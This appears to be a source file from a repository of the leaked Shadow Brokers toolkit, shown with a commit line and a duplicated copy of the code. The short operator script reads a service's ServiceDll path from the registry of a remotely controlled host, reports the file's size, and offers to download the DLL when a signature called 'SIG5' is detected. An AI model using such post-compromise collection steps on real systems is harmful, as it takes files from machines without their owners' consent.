shadowbrokers-exploits/windows/Resources/Ep/Scripts/malfind/getsig5.eps

@record on;
`regquery -hive L -subkey "system\\currentcontrolset\\services\\systmgmt\\Parameters" -value ServiceDll`;

string $service_dll = GetCmdData("value_data");
`dir $service_dll`;

int $size = GetCmdData("size");

@record off;


if (prompt "SIG5 was detected.  Do you want to grab the server dll? ($service_dll, size of $size bytes)") {
	`get $service_dll`;
}
Inital commit of Shadowbrokers 'Lost in Translation' release 2017-04-14 09:45:07 +00:00			`@record on;`
			`regquery -hive L -subkey "system\\currentcontrolset\\services\\systmgmt\\Parameters" -value ServiceDll`;

			`string $service_dll = GetCmdData("value_data");`
			`dir $service_dll`;

			`int $size = GetCmdData("size");`

			`@record off;`


			`if (prompt "SIG5 was detected. Do you want to grab the server dll? ($service_dll, size of $size bytes)") {`
			`get $service_dll`;
			`}`